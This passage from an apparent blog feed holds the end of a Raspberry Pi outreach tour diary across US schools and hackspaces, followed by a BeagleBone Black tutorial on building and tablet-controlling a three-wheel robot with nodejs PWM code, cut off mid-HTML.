In the evening Rob, Kendra and I went out to eat – we had a beer in a book shop and ate bacon (out of a jam jar) dipped in chocolate. True story. We also took some group awkward selfies:


Sat 9 – Pigeon River, Tennessee

The Saturday I’d assigned to be a day off – I hoped to go kayaking with Rob but he had to work and Kendra was busy so Rob put me in touch with some paddling friends who welcomed me to join them on a trip to the Pigeon River in Tennessee! An early start of 6am left me snoozing in the back of the car, which Matt took the chance to snap a picture of and post it to Facebook (I only found out when Rob mentioned it later that evening). We had a nice couple of runs of the river by kayak, accompanied by a rafting party. And another awkward selfie.


Sun 10 – Lawrenceville, Georgia

On Sunday morning I left Rob and Kendra’s for Georgia. One of the requests I’d had was from a man called Jerry who just wanted to meet me if I was passing by. I said it’d be great if he could set up a public meeting to be more inclusive – and he got back in touch with a meetup link for an event at Geekspace Gwinnett – a community centre and hackspace in Lawrenceville. I pulled up, shook hands with Jerry and was shown to the front of the room to connect up my laptop. There was a larger crowd than I’d imagined, seeing as Jerry had set the event up just a few days prior to this – but there were about 40 people there, who were all very interested in Raspberry Pi and after my talk we had a great discussion of everyone’s personal projects.


Liz, who runs marketing for the space, gave me a tour, and Joe, the guy setting up the AV for my presentation spotted the Adventure Time stickers on my laptop and told me he worked for Turner in Atlanta who broadcast Cartoon Network, and offered to give me a tour of the network when he went on his night shift that evening. I went to Jerry’s house where he and his wife cooked for me and he showed me Pi Plates, the extension board he’s been working on.


I then left to meet Liz and her husband, Steve, who has been working on a huge robotics project – a whole wearable suit (like armour) that’s powered by a Pi and will make sounds and be scary! I look forward to the finished product. They also have an arcade machine Steve built years ago (pre-Pi) which houses a PC and which, he claims, had basically every arcade game ever on it.



Did you know there was a Michael Jackson game for the Sega Mega Drive, where you have to perform dance moves to save the children? Neither did I.

We set off for Atlanta at about 11.30pm and I witnessed its beautiful skyline, which is well lit up at night. We arrived at Turner and met Joe, who gave us the tour – I’ve never seen so many screens in my life. They show all the broadcast material for TV and web on screens and have people sit and watch them to ensure the integrity of the material and ensure the advertising rules are adhered to. We also saw the Cartoon Network floor of the office side of the building where staff there work on the merchandise for shows like Adventure Time!



Joe also showed us the Turner Makers room – a mini hackspace for the Turner staff to work on side projects – he told me of one which used a Raspberry Pi to control steps that would light up and play a musical note as you walked across them. They’re currently working on a large games arcade BMO with a normal PC size screen as a display – I look forward to seeing it in action when it’s finished.


It’s great to see the space has since set up their own monthly Raspberry Pi group!

Mon 11 – Chattanooga, Tennessee

I then left Georgia to return to Tennessee, where I’d arranged to visit Red Bank Middle School in Chattanooga. I arrived at the school, signed in to get my visitor’s badge and met Kimberly Elbakidze - better known to her students as Dr. E – who greeted me with a large Subway sandwich. I ate in the canteen and while chatting with some of the staff I noticed the uniformed security guard patrolling the room had a gun on his belt. Apparently this is normal in American schools.

It was the first day back at the school, so the children were being oriented in their new classes. I gave two short talks, introducing the Raspberry Pi and what you can do with it – to sixth and eighth graders, and opened for some questions:

“Do you like Dr. Who?”
“Is that your real accent?”
“Are you really from England?”
“Can I get a picture with you?”
“Can I keep Babbage?”



I wrapped up, left them a copy of Carrie Anne’s book and some Pis, and went on my way. I’d intended to get online and confirm the details of my next school visit (I’d arranged the date with the teacher, but we hadn’t settled on the time or what we were doing), but access to the internet from the school was restricted to staff so I couldn’t get on. I had to set off for Alabama, and only had the school name and the town. I put the town name in to my car’s GPS and set off.

Tue 12 – Talladega, Alabama

I arrived in Talladega town centre unsure how close I was to the school. I parked up and wandered down the main street in magnificent sunshine and intense heat looking for a McDonald’s or Starbucks, hoping to get on some WiFi to check where it was. With no luck, I headed back to the car and decided to just find a hotel and hope that I was at least nearby. I asked someone sitting outside a shop if they knew of the school – RL Young Elementary School – and they said it was just 15 minutes or so away, so I asked for a nearby hotel and she pointed me in the right direction. As I neared the car, the intense heat turned in to a terrific storm – the 5 minute drive to the hotel was in the worst rain I’ve ever seen.


I checked in to the hotel and got on with my emails – I sent one to the teacher who’d requested me at the school to say I’d arrived in Talladega, that I was staying in the Holiday Inn, and asked what time I should come in. My hotel phone rang 5 minutes later – it was the husband of the teacher. Trey said the principal hadn’t been told about the visit yet, and the details needed to be confirmed with her before we set a time – but they would sort it out as soon as possible and let me know. He offered to take me out for a meal that night so I arranged to meet him within an hour. Just as I was leaving I got an email from someone called Andrew who said he’d just spotted I was in Talladega, and asked if I could meet him if I had time – I said if he could get to the restaurant, I’d be there for the next couple of hours.

As I arrived I met them both, and introduced them to each other. Driving through that afternoon I’d noticed the town has about 50 churches. Trey said he recognised Andrew’s surname, and Andrew said his father was the priest of one of the churches, and Trey said he knew him. Andrew was also training to become a priest like his Dad, and Trey said he’d skipped Bible school that night to come and meet me. We had a nice meal and a chat and Trey said he’d let me know in the morning what the plans for the school visit were. Andrew offered to take me out for breakfast and show me around the town. I said I’d contact him in the morning once I’d heard the timings from Trey.

Once I woke up the next morning my email told me I needed to be at the school for about 1pm, so I had time to go to breakfast with Andrew, and he showed me around the place. I also visited his home and his church and met his family. He showed me some Raspberry Pi projects he’s been working on too.


He also offered to help out at the school – RL Young Elementary, so we got my kit and he drove us over. We signed in at reception where we entered our names in to a computer which printed visitor labels (seriously – a whole PC for that – and another just showing pictures of dogs! The Raspberry Pi was definitely needed in this place).


I was to follow a woman from the Red Cross, who gave a talk to the children about the importance of changing their socks every day. I thought an introduction to programming with Minecraft might blow their smelly socks right off!

The principal attempted to introduce me but had no idea who I was or why I was there, so just let me get on with it. I spoke to the young children and introduced the Raspberry Pi, focusing on a Minecraft demo at the end where I let them have a go themselves. The principal thanked me, said it was interesting and wished me a safe trip back to Australia! I left them some Pis and a copy of Adventures in Raspberry Pi.

Wed 13 – Somerville, Tennessee

I’d arranged my next visit with a very enthusiastic teacher called Terri Reeves from the Fayette Academy (a high school) in Somerville, Tennessee. In her original request she’d said she wasn’t really on my route, but would be willing to travel to meet me for some training – but I explained I’d changed my route to try to hit as many requests as I could, so I’d be happy to visit the school. She offered to let me stay at her house, and told me her husband would cook up some Southern Barbecue for me on arrival. It was quite a long drive and I arrived just after sunset – the whole family was sitting around the table ready to eat and I was welcomed to join them. I enjoyed the Southern Barbecue and was treated to some Razzleberry Pie for dessert. I played a few rounds of severely energetic ping pong with each of Terri’s incredibly athletic sons and daughters before getting to bed.

I spent most of the day at the school, where I gave my Raspberry Pi talk and demo to each of Terri’s classes. Again, it was the first week back for the school so it was just orientation for students settling in to their classes and new routines. The information went down well across the board and Terri said lots of students wanted to do Raspberry Pi in the after-school classes too.

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

I joined some students for lunch, who quizzed me on my English vocabulary and understanding of American ways – they thought it was hilarious when I pointed out they said “Y’all” too much. I suggested they replace it with “dawg”. I do hope this lives on.





I also took a look at a project Terri had been trying to make in her free period – she’d been following some (really bad) instructions for setting up a webcam stream from a Pi. I diagnosed the problem fairly quickly – the apt-get install motion command she’d typed had failed as the site containing the .deb was blocked on the school network (for no good reason!) – I asked if we could get it unblocked and the network administrator came over and unblocked it. She originally only wanted to unblock it for the Pi’s IP address, but I explained it would mean no-one could install things or update their Pis without access to that website, so she unblocked it system-wide. I tried again and there were no further problems, so we proceeded to the next steps.

I then drove about an hour West to Downtown Memphis where I spent the early evening between Elvis Presley Boulevard and Beale Street (no sign of a Clive museum, just a row of Harley Davidsons) where I bought a new hat, which soon became the talk of the office.


My new hat


When I returned to Terri’s house she asked me to help her with webcam project again – I checked she’d done all the steps and tried opening the stream from VLC Player on my laptop. I’ve never heard anyone shriek with joy so loud when she saw the webcam picture of us on that screen! Terri was overjoyed I’d managed to help her get that far.

Thu 14 – Louisville, Kentucky

I left the next morning for Louisville (pronounced Lou-er-vul), and en route I realised I’d started to lose my voice. I arrived in the afternoon for an event at FirstBuild, a community hackspace run by General Electric. The event opened with an introduction and a few words from me, and then people just came to ask me questions and show me their projects while others were shown around the space and introduced to the equipment.



Check out this great write-up of the FirstBuild event: Louisville, a stop on US tour for credit-card sized computers.

We then proceeded to the LVL1 hackerspace where I was given a tour before people arrived for my talk. By this point my voice had got quite bad, and unfortunately there was no microphone available and the room was a large echoey space. However I asked people to save questions to the end and did my best to project my voice. I answered a number of great questions and got to see some interesting projects afterwards.





Fri 15 – St. Louis, Missouri

Next – St. Louis (pronounced Saint Lewis), Missouri – the home of Chuck Berry. I had a full day planned by teacher and tinkerer Drew McAllister from St. John Vianney High School. He’d arranged for me to meet people at the Grand Center Arts Academy at noon, then go to his school to speak to a class and the after school tech club followed by a talk at a hackspace in the evening.

I was stuck in traffic, and didn’t make it to the GCAA meetup in time to meet with them, so we headed straight to the school where I gave a talk to some very smartly dressed high school students, which was broadcast to the web via Google Hangouts. Several people told me afterwards how bad my voice sounded on the Hangout. Here it is:

I had a few minutes’ rest before moving next door to the server room, where they host the after school tech club – Drew kindly filled in the introduction of the Pi to begin (to save my voice) and asked students if they knew what each of the parts of the Pi were for. I continued from there and showed examples of cool projects I thought they’d like. I gave Drew some Pis for the club and donated some Adafruit vouchers gifted by James Mitchell – as I thought they’d use them well.


Drew showed me around St. Louis and took me out for a meal (I consumed lots of hot tea for my throat) before we went to the Arch Reactor hackerspace. I gave my talk and answered a lot of questions before being given a tour of the space.



Throat sweet selfie



Sat 16 – Columbia, Missouri

In the morning I left in the direction of Denver, which was a journey long enough to have to break up over two days. With no visit requests in Kansas City, but one in Columbia, which was on my way and not very far away, I stopped there to meet with a group called MOREnet, who provide internet connection and technical support to schools and universities. Rather than have me give a talk, they just organised a sit-down chat and asked me questions about education, teacher training and interesting ways of learning with Raspberry Pi. Some of the chat was video recorded, which you can watch at (please excuse my voice).


I even got to try Google Cardboard – a simple virtual reality headset made with cardboard and an Android phone. A very nice piece of kit! I stayed a couple of hours and made my way West. I’d asked around for a good place to stay that night on my way to Denver. Some people had suggested Hays in Kansas so I set that as my destination. It had taken me 2 hours to get to Columbia and would be another 6+ hours to Hays, so it was always going to be a long day, but at least I was in no rush to arrive anywhere for a talk or event.

Kansas City Selfie

I stopped briefly in Kansas City (actually in the state of Missouri, not Kansas) to find almost nobody out and almost everything closed. I think it’s more of a nightlife town. I finally arrived in Hays at 8.30pm after the boring drive through Kansas and checked in to a hotel just in time for a quick dip in the swimming pool.


Sun 17 – Denver, Colorado

I left Hays for Denver, which meant I had a good 5+ hour drive ahead – all along that same freeway, the I-70 – to arrive at denhac, the Denver Hackspace, for 4pm. I’d also arranged late the night before to visit another Denver hackspace afterwards, so I said I’d be there at 7pm. On my way in to Denver I noticed a great change in weather – lots of dark grey and black clouds ahead – and as I got closer I entered some rough winds and even witnessed a dust storm, where dust from the soil and crops of the fields was swept in to the air. It was surreal to drive through!


I worked out later that the distance I’d travelled that day was roughly equivalent to driving from Southampton to Inverness! The longest I’ve driven before is Southport to Cambridge!

I arrived just on time and was greeted by Sean, who had invited me. He introduced me to the members, all sitting around their laptop screens, and gave me a tour of the space. He told me how the price of the space had been rising recently due to the new demand for warehouse space such as theirs for growing cannabis, now that it is legal in Colorado. I took some pictures of cool stuff around the space, including a Pibow-encased Pi powering a 3D printer. I even got to try on Sean’s Google Glass (I think Cardboard is much better).

To Grace Hopper, you will always be grasshopper



One of the neatest Pi cases I've ever seen


I met a young girl, about 12 years old, who told me she recently went into an electronics shop saying she wanted to buy a Raspberry Pi for a new project, and the member of staff she spoke to had never heard of a Raspberry Pi and assumed she wanted to cook one. Anyway, I gave her one of mine – she was delighted and immediately announced it in the networked Minecraft game she was hosting. I gave my talk in their classroom (great to see a classroom in a hackspace) before heading to my next stop – TinkerMill.

TinkerMill is a large hackspace, coworking space and startup accelerator in Denver. On arrival a group of people were sitting ready for my talk, so I got set up and was introduced by Dan, who runs the space and works out of it. The hackspace version of my talk includes more technical detail and updates on our engineering efforts. This went down well with the group, and after answering a few questions we broke out into informal chat about the Pi’s possibilities and the great things that have come out of the educational mission.


I found a Mini Me


I also met a woman called Meg, who was standing at the back of the room. I got chatting to her and she asked me a few questions. She hadn’t attended the event but had just come to use the laser cutter for the evening, and caught the end of the talk. She kept asking me questions about the Pi, and in answering them I basically gave the talk again. The reason she’d not come to the talk was that she was looking to use an Arduino in some future projects: she assumed it would be easier than using a Pi, on the basis that she’d heard you could do more with a Pi, so it must be more complex. I explained the difference to her, hoping this would shed light on how the Pi might be useful to her after all, and that she would be able to choose a suitable and appropriate tool or language on the Pi, which is not an option with an Arduino. She also discussed ideas for creative projects and wearables, which were really interesting, and I told her all about Rachel’s project Zoe Star and put her in touch with Rachel, Charlotte and Amy. Dan took Meg and me out to dinner and we had a great time.

Mon 18 – Boulder, Colorado

Dan offered to put me up and show me around Denver the following day – I’d originally planned to get straight off to Utah the next day but it made sense to have an extra day in Denver – I’m glad I did as I really enjoyed the town and got to have a great chilled out day before driving again. We drove up one of the nearby mountains to a height of almost 10,000 feet.


Mountain selfie


I wandered around Boulder, a wonderful town full of cafes, restaurants and interesting shops. I ended up buying most of my awful souvenirs there – including a three-tiered monkey statue for Liz:

And you are a monkey too

We ate at a restaurant called Fork so it seemed appropriate to get a picture for my Git/GitHub advocacy!



Colorado seemed to be the most recognisable state in all the places I visited, by which I mean it was culturally closest to Britain. My accent didn’t seem too far from theirs, either. A really nice place with great food and culture, with mountains and rivers right on hand. I could live in a place like that!


Tue 19 – Provo, Utah

I left Dan’s in the morning and headed West along the I-70 again. After a couple of bathroom breaks I got on some McDonald’s WiFi and checked my email and twitter – I’d had a tweet asking if I would be up for speaking in Provo that night. I thought “why not?” and said yes – expecting to arrive by 7pm, I suggested they make it 8pm just in case. I was actually heading to Provo already, in hope of meeting up with some family friends, Ken and Gary, who I stayed with last time I visited Utah. I hadn’t managed to get hold of them yet, but I kept ringing every now and then to see if they were around. When I finally got hold of them, they asked if they could come to see my presentation – so I told them where it was and said I’d see them there.

As I entered Utah the scenery got more and more beautiful – I pulled up a few times to get pictures. The moment I passed the ‘Welcome to Utah’ sign I realised what a huge feat I’d accomplished, and as I started to see signs to Salt Lake City – my end point – I was overjoyed. I hadn’t covered much distance across the country in my first week, as I’d gone South, along a bit, North and East a bit before finally setting off from St. Louis in the direction of the West Coast, so finally starting to see the blue dot on my map look a lot closer to California meant a lot.



I arrived in Provo about 7.30, located the venue, the Provo Web Academy, and by the time I found the right place and parked up it was 8pm. I was greeted by the event organiser, Derek, and my friends Ken and Gary! I hadn’t seen them for 13 years so it was a pleasure to meet again. I set up my presentation and gave my talk, had some great questions and inspired the group of about 20 (not bad, considering it had been organised just a few hours earlier) to make cool things with Pi and teach others to do the same. I went out to eat with Ken and Gary and caught up with them.

Wed 20 – Logan, Utah

The next day I had my talk planned for 4pm in Logan (North of Salt Lake City) so I had all morning free to spend with Ken (retired) while Gary was at work. Back story: my Mum (a primary school teacher) spent a year at a school in Utah in 1983-84 on an exchange programme. Ken was a fellow teacher at the school, and like many others, including families of the kids she taught, she kept in touch with him. As I said, we visited in 2001 while on a family holiday, and stayed with them on their farm. So Ken and I went to the school – obviously many of the staff there knew Ken as he only recently retired, and he told them all about my Mum and that I was touring America and wanted to visit the school. None of the teachers there were around in 1984, but some of the older ones remembered hearing about the English teachers who came that year. I took photos of the school and my Mum’s old classroom and sent them to her. We visited another teacher from that time who knew all about me from my Mum’s Christmas letter (yikes!) and even went to see the trailer my Mum lived in for the year!


I then left Provo for Logan, where the talk was to take place at Utah State University. I’d prepared a talk for university students, really, but discovered there was a large proportion of children there from a makers group aimed at getting kids into tech hardware projects – but they seemed to follow along and get some inspiration from the project ideas. Down to my last two Pis, I did what I did at most events and called out for the youngest people in the room – they went to a 5-year-old and a 7-year-old – and my demo Babbage (I mention Dave Akerman’s Space Babbage in all my talks) was given to a family too.


My final talk was recorded, but they told me they were recording the other screen so I’m out of the frame in most of the video.

Happy to have completed the tour, sad for my journey to be coming to an end, but glad to be able to sit down and take a breather, I chilled out for a while before heading back to Provo for my final night in America. At one point I thought I wouldn’t make it back, as I hit a storm on my way home and could barely see the road in front of me through the incredible rain. With the entire 4-lane freeway slowing to 40mph and high beams glaring, I caught glimpses of the white lines now and then, corrected the wheel accordingly, and made it home safely to join Ken and Gary for dinner.

Ken, me, Gary


Thu 21 – Salt Lake City, Utah

I bade farewell and left for the airport, where I returned my hire car with 4,272 new miles on it – 10% of the car’s overall mileage!


I flew from Salt Lake City to New York and stupidly forgot to tell them that wasn’t my final destination, so I had to retrieve my suitcases at JFK baggage claim and check them back in for my next flight – because, you know, I like stress. Despite the internal flight running late and me not having a boarding card for my second flight (I’d had no access to a printer or WiFi in the 24 hours before), my luggage and I were successfully transported back to London. I was driven back to Cambridge, then up to Sheffield, where I bought a suit, had my hair cut and attended the wedding of two great friends – congratulations, Lauren and Dave!

Lauren and Dave


What did I learn?

  • Despite sales of Pis in America being the biggest in the world, the community is far less developed than it is in the UK and in other parts of Europe. There are hardly any Jams or user groups, but there is plenty of interest!
  • American teachers want (and need) Picademy – or some equivalent training for using Pis in the classroom.
  • There is a perception that Raspberry Pi is not big in America (due to the lack of community), and an assumption that Pis are hard to buy there. While availability is still limited in many hardware stores (though people should bug stores not selling Pi and accessories to start stocking stuff!), I refer people to Amazon, Adafruit and our main distributors, Element14 and RS Components. You can also buy them off the shelf at RadioShack.
  • If you build it, they will come. Announcing that I would turn up to a hackspace on a particular day brought people from all walks of life together to talk about Raspberry Pi, in much the same way a Raspberry Jam does in the UK. I could stand in front of these people and make them realise there is a community – they’re sitting in the middle of it. All they need is a reason to meet up – a Jam, a talks night, an event, a hack day, a tech club. It’s so easy to get something started, and you don’t need to start big – just get a venue and some space, tell people to turn up with Pis and take it from there.

Huge thanks to all the event organisers, the people who put me up for the night or took me out for a meal, and everyone involved in this trip. Sorry if I didn’t make it to you this time around – but I have a map and a list of the places we’re wanted, so we hope to cover more ground in future.

You can view the last iteration of my talk slides at slideshare.

Linux How-Tos and Linux Tutorials: How to Control a 3 Wheel Robot from a Tablet With BeagleBone Black

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

Give the BeagleBone Black its own wheels, completely untether any cables from the whole thing and control the robot from a tablet.

The 3 Wheel Robot kit includes all the structural material required to create a robot base. To the robot base you have to add two gearmotors, batteries, and some way to control it. Leaving the motors out of the 3 wheel kit allows you to choose the motor with a torque and RPM suitable for your application.

In this article we’ll use the Web server on the BeagleBone Black and some Bonescript to allow simple robot control from any tablet. No ‘apps’ required. Bonescript is a nodejs environment which comes with the BeagleBone Black.

Shown in the image at left is the 3 wheel robot base with an added pan and tilt mechanism. All items above the long black line and all batteries, electronics, cabling, and the two gearmotors were additions to the base. Once you can control the base using the BeagleBone Black, adding other hardware is relatively easy.

This article uses two 45 rpm Precision Gear Motors. The wheels are 6 inches in diameter, so the robot will be speed-limited to about 86 feet per minute (26 meters/min). These motors can run from 6-12 volts and draw a maximum stall current of 1 amp. The full stall current is drawn when the motor is trying to turn but is unable to – for example, if the robot has run into a wall and the tires do not slip. It is a good idea to detect cases that draw stall current and turn off power to avoid overheating and/or damaging the motor.

In this series on the BeagleBone Black we have also seen how to use the Linux interface allowing us to access chips over SPI and receive interrupts when the voltage on a pin changes, and how to drive servo motors.

Constructing the 3 Wheel Robot

3 wheel robot kit parts

The parts for the 3 Wheel Robot kit are shown above (with the two gearmotors in addition to the raw kit). You can assemble the robot base in any order you choose. A fair number of the parts are used, together with whichever motors you selected, to mount the two powered front wheels. The two pieces of channel are connected using the hub spacer and the swivel hub is used to connect the shorter piece of channel at an angle at the rear of the robot. I’m assuming the two driving wheels are at the ‘front’. I started construction at the two drive wheels as that used up a hub adapter, screw hub, and two motor mount pieces. Taking those parts out of the mix left less clutter for the subsequent choice of pieces.

Powering Everything

In a past article I covered how the BeagleBone Black wants from about 2.5 up to the low 3 watts of power to operate. The power requirements for the BeagleBone Black can be met in many ways. I chose to use a single 3.7-volt 18650 lithium battery and a 5 V step-up board. The BeagleBone Black has a power jack expecting 5 V. At a high CPU load the BeagleBone Black could take up to 3.5 W of power, so the battery and step-up converter have to be comfortable supplying 5 V at 700 mA. The battery is rated at about 3 amp-hours, so the BeagleBone Black should be able to run for hours on a single charge.

The gearmotors for the wheels can operate on 6 to 12 V. I used a second battery source for the motors so that they wouldn’t interfere with the power of the BeagleBone Black. For the motors I used a block of 8 NiMH rechargeable AA batteries. This only offered around 9.5 V, so the gearmotors would not achieve their maximum performance, but it was a cheap supply to get going. I have manually avoided stalling either motor in testing so as not to attempt to draw too much power from the AA batteries. Either some stall protection to cut power to the gearmotors and protect the batteries should be used, or a more robust (and expensive) motor battery source – for example, monitoring current and turning off the motors if they attempt to draw too much.
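Such stall protection could be as simple as watching for a sustained draw near the stall figure. This is an illustrative sketch, not part of the original build: the helper name, the sampling scheme and the idea of requiring several consecutive over-threshold samples (to ignore brief current spikes) are all assumptions.

```javascript
// Decide whether to cut motor power based on recent current samples (in amps).
// A sustained draw at or above the threshold – rather than a brief spike –
// suggests the motor is stalled and should be disabled.
function shouldCutPower(samplesAmps, thresholdAmps, sustainedCount) {
    var over = 0;
    for (var i = 0; i < samplesAmps.length; i++) {
        if (samplesAmps[i] >= thresholdAmps) {
            over++;
            if (over >= sustainedCount) return true;  // stalled long enough
        } else {
            over = 0;  // a dip below threshold resets the run
        }
    }
    return false;
}
```

With the 1 A stall figure quoted earlier, a threshold just under that (say 0.95 A) over a handful of consecutive samples would be a reasonable starting point.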

The motor power supply was connected to the H-bridge board, making the ground terminal on the H-bridge a convenient location for a common ground connection to the BeagleBone Black.

Communicating without Wires

The BeagleBone Black does not have on-board wifi. One way to allow easy communication with the BeagleBone Black is to flash a TP-Link WR-703N with openWRT and use that to provide a wifi access point for access to the BeagleBone Black. The WR-703N is mounted to the robot base and is connected to the ethernet port of the BeagleBone Black. The tablets and laptops can then connect to the access point offered by the onboard WR-703N.

I found it convenient to set up the WR-703N to be a DHCP server and to assign the same IP address to the BeagleBone Black as it would have obtained when connected to my wired network. This way the tablet can communicate with the robot both in a wired prototyping setup and when the robot is untethered.
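On openWRT such a fixed assignment is a static DHCP lease declared in /etc/config/dhcp. The hostname, MAC address and IP below are placeholders, not the actual values used on this robot:

```
config host
	option name 'beaglebone'
	option mac  '00:11:22:33:44:55'
	option ip   '192.168.1.50'
```

After editing the file, restarting dnsmasq on the WR-703N makes the lease take effect.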

Controlling Gearmotors from the BeagleBone Black

Unlike the servo motors discussed in the previous article, gearmotors do not have a Pulse Width Modulation (PWM) control line to set an angle to rotate to. There is only power and ground to connect. If you connect the gearmotor directly to a 12 V power source it will spin up to turn as fast as it can. To turn the gearmotor a little more slowly, say at 70 percent of its maximum speed, you need to supply power only 70 percent of the time. So we want to perform PWM on the power supply wire to the gearmotor. Unlike the PWM used to control the servo, we do not have any fixed 20 millisecond time slots forced on us. We can divide up time any way we want, for example running full power for 0.7 seconds then no power for 0.3 s, though a time slice shorter than 1 s will produce smoother motion.
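The arithmetic here is just a duty-cycle split. A minimal sketch of it – the helper name is mine, and the period is a free choice as discussed above, not anything fixed by the hardware:

```javascript
// Split one PWM period into on/off time for a desired speed.
// speedPercent: 0-100; periodMs: the length of one time slice in ms.
function dutyCycle(speedPercent, periodMs) {
    var onMs = periodMs * (speedPercent / 100);
    return { onMs: onMs, offMs: periodMs - onMs };
}
```

For example, dutyCycle(70, 1000) reproduces the 0.7 s on / 0.3 s off split from the text; shrinking periodMs keeps the same ratio while smoothing the motion.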

An H-Bridge chip is useful to be able to switch a high voltage, high current wire on and off from a 3.3 V wire connected to the BeagleBone Black. A single H-Bridge will let you control one gearmotor. Some chips like the L298 contain two H-Bridges; two H-Bridges are useful if you want to control stepper motors. A board containing an L298, heatsink and connection terminals can be had for as little as $5 from a China-based shop, up to more than $30 for a fully populated configuration made in Canada that includes resistors allowing you to monitor the current drawn by each motor.

The L298 has two pins to control the configuration of the H-Bridge and an enable pin. With the two control pins you can configure the H-Bridge to flow power through the motor in either direction. So you can turn the motor forwards and backwards depending on which of the two control pins is set high. When the enable pin is high then power flows from the motor batteries through the motor in the direction that the H-Bridge is configured for. The enable pin is where to use PWM in order to turn the motors at a rate slower than their top speed.
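That control scheme amounts to a small truth table. The helper and the in1/in2 names below are illustrative (they are not the datasheet's pin labels); the enable pin is driven separately with PWM to set the speed:

```javascript
// Map a requested direction to the two H-Bridge control inputs.
// With one input high and the other low, current flows through the
// motor in one direction; swapping them reverses it. Both low means
// no power flows through the motor regardless of the enable pin.
function bridgeState(direction) {
    if (direction === 'forward') return { in1: 1, in2: 0 };
    if (direction === 'reverse') return { in1: 0, in2: 1 };
    return { in1: 0, in2: 0 };  // 'stop' or anything else: no drive
}
```

On the robot these states become digitalWrite() calls on the control pins, as the server listing later does with P8_37 to P8_40.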

The two control lines and the enable line allow you to control one H-Bridge and thus one gearmotor. The L298 has a second set of enable and control lines so you can control a second gearmotor. Other than those lines the BeagleBone Black has to connect ground and 3.3 V to the H-Bridge.

When I first tried to run the robot in a straight line I found that it gradually turned left. After some experimenting I found that at full power the left motor was rotating at a slightly slower RPM relative to the right one. I’m not sure where this difference was being introduced, but having found it early in the testing the software was designed to allow such calibration to be performed behind the scenes. You select 100 percent speed straight ahead and the software runs the right motor at only 97 percent power (or whatever calibration adjustment is currently applied).

To allow simple control of the two motors I used two concepts: the speed (0-100) and heading (0-100). A heading of 50 means that the robot should progress straight ahead. This mimics a car interface where steering (heading) and velocity are adjusted and the robot takes care of the details.
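The mixing can be expressed as a small pure function. This standalone sketch is mine, though it follows the same scaling that the setSpeed() method shown later applies: steering away from centre proportionally slows one wheel.

```javascript
// Convert (speed 0-100, heading 0-100 with 50 = straight ahead)
// into per-wheel power levels. Moving the heading away from 50
// scales one wheel's power down, turning the robot that way.
function mixWheels(speed, heading) {
    var left = speed, right = speed;
    if (heading > 50) left  *= 1 - (heading - 50) / 50;  // slow the left wheel
    if (heading < 50) right *= 1 - (50 - heading) / 50;  // slow the right wheel
    return { left: left, right: right };
}
```

For example, full speed with the heading slider at 75 gives the left wheel half power and the right wheel full power, producing a gentle turn.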

I have made the full source code available on github. Note the branch that is frozen in time at the point of this article; the master branch contains some new goodies and a few changes to the code structure, too.

The Server

Because the robot base was “T” shaped, over time it was referred to as TerryTee. The TerryTee nodejs class uses bonescript to control the PWM for the two gearmotors.

The constructor takes the pin identifier to use for the left and right motor PWM signals and a reduction to apply to each motor, with 1.0 being no reduction and 0.95 meaning the motor runs at only 95 percent of the specified speed. The reduction is there so you can compensate if one motor runs slightly slower than the other.

function TerryTee( leftPWMpin, rightPWMpin, leftReduction, rightReduction )
{
    TerryTee.running = 1;
    TerryTee.leftPWMpin = leftPWMpin;
    TerryTee.rightPWMpin = rightPWMpin;
    TerryTee.leftReduction = leftReduction;
    TerryTee.rightReduction = rightReduction;
    TerryTee.speed = 0;
    TerryTee.heading = 50;
}

The setPWM() method shown below is the lowest-level one in TerryTee; other methods use it to change the speed of each motor. The PWMpin selects which motor to control and ‘perc’ is the percentage of time that motor should be powered. I also made perc accept values from 0–100 as well as from 0.0–1.0 so the web interface could deal in whole numbers.

When an emergency stop is active, running is false, so setPWM will not change the current signal. setPWM also applies the motor strength calibration automatically so higher-level code doesn’t need to be concerned with it. As the analogWrite() Bonescript call uses the underlying PWM hardware to output the signal, the PWM does not need to be constantly refreshed from software: once you set 70 percent, the robot motor will continue to try to rotate at that speed until you tell it otherwise.

TerryTee.prototype.setPWM = function (PWMpin, perc)
{
    if( !TerryTee.running )
	return;
    if( PWMpin == TerryTee.leftPWMpin ) {
	perc *= TerryTee.leftReduction;
    } else {
	perc *= TerryTee.rightReduction;
    }
    if( perc > 1 )
	perc /= 100;
    console.log("awrite PWMpin:" + PWMpin + " perc:" + perc );
    b.analogWrite( PWMpin, perc, 2000 );
};

The setSpeed() call takes the current heading into consideration and updates the PWM signal for each wheel to reflect the heading and speed you have currently set.

TerryTee.prototype.setSpeed = function ( v )
{
    if( !TerryTee.running )
	return;
    if( v < 40 ) {
	TerryTee.speed = 0;
	this.setPWM( TerryTee.leftPWMpin,  0 );
	this.setPWM( TerryTee.rightPWMpin, 0 );
	return;
    }
    var leftv  = v;
    var rightv = v;
    var heading = TerryTee.heading;
    if( heading > 50 ) {
	if( heading >= 95 )
	    leftv = 0;
	else
	    leftv *= 1 - (heading-50)/50;
    }
    if( heading < 50 ) {
	if( heading <= 5 )
	    rightv = 0;
	else
	    rightv *= 1 - (50-heading)/50;
    }
    console.log("setSpeed v:" + v + " leftv:" + leftv + " rightv:" + rightv );
    this.setPWM( TerryTee.leftPWMpin,  leftv );
    this.setPWM( TerryTee.rightPWMpin, rightv );
    TerryTee.speed = v;
};

The server itself creates a TerryTee object and then offers a Web socket to control that Terry. The ‘stop’ message is intended as an emergency stop: it forces Terry to stop moving and ignore input for a period of time so that you can get to it and disable the power in case something has gone wrong.

var terry = new TerryTee('P8_46', 'P8_45', 1.0, 0.97 );
terry.setSpeed( 0 );
terry.setHeading( 50 );
b.pinMode     ('P8_37', b.OUTPUT);
b.pinMode     ('P8_38', b.OUTPUT);
b.pinMode     ('P8_39', b.OUTPUT);
b.pinMode     ('P8_40', b.OUTPUT);
b.digitalWrite('P8_37', b.HIGH);
b.digitalWrite('P8_38', b.HIGH);
b.digitalWrite('P8_39', b.LOW);
b.digitalWrite('P8_40', b.LOW);
io.sockets.on('connection', function (socket) {
  socket.on('stop', function (v) {
      terry.setSpeed( 0 );
      terry.setHeading( 0 );
  });
  socket.on('speed', function (v) {
      console.log('set speed to ', v.value );
      if( typeof v.value === 'undefined')
	  return;
      terry.setSpeed( v.value );
  });
});

The code on github is likely to evolve over time to move the various fixed cutoff numbers to be configurable and allow Terry to be reversed from the tablet.

The Client (Web page)

To quickly create a Web interface I used Bootstrap and jQuery. If the interface became more advanced then perhaps something like AngularJS would be a better fit. To control the speed and heading with an easy touch interface I also used the bootstrap-slider project.

<div class="inner cover">
  <div class="row">
